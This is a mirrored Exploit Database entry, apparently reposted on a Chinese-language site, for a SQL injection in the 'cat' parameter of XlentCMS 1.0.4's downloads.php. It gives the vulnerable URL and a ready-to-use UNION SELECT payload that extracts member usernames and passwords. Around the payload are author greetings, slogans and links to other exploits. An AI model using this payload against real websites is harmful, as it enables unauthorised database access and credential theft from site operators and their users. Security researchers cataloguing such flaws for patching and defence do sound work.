XlentCMS 1.0.4 – ‘downloads.php?cat’ SQL Injection

Exploit Database
31 阅读

作者： Gamoscu

日期： 2010-01-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/10899/

 Script: XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability

 Script site : http://sphere.xlentprojects.se/portal.php 

 AUTHOR: Gamoscu
 
 HOME: http://www.1923turk.biz

 Blog: http://gamoscu.wordpress.com/

 Greetz: Manas58 Baybora Delibey Tiamo Psiko Turco infazci X-TRO
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://www.xxx.com/path/downloads.php?cat=[SQL]

Example:

1+union+select+1,id,3,4,username%20,password,7,8,9+from+xcms_members--


Vatan Lafla De&#65533;il Eylemle Sevilir

Kiskananlar catlasin Zorunuza Gitmesin

last Exploits
XlentCMS 1.0.4 – ‘downloads.php?cat’ SQL Injection的更多信息

Lisk CMS 4.4 – ‘id’ Multiple Cross-Site Scripting / SQL Injections：
Web Wiz Forums – Multiple Cross-Site Scripting Vulnerabilities：
Satellian 1.12 – Remote Code Execution：
Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)：
gleamtech filevista/fileultimate 4.6 – Directory Traversal：
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution：
Ginkgo CMS – ‘index.php?rang’ SQL Injection：
CI User Login and Management 1.0 – Arbitrary File Upload：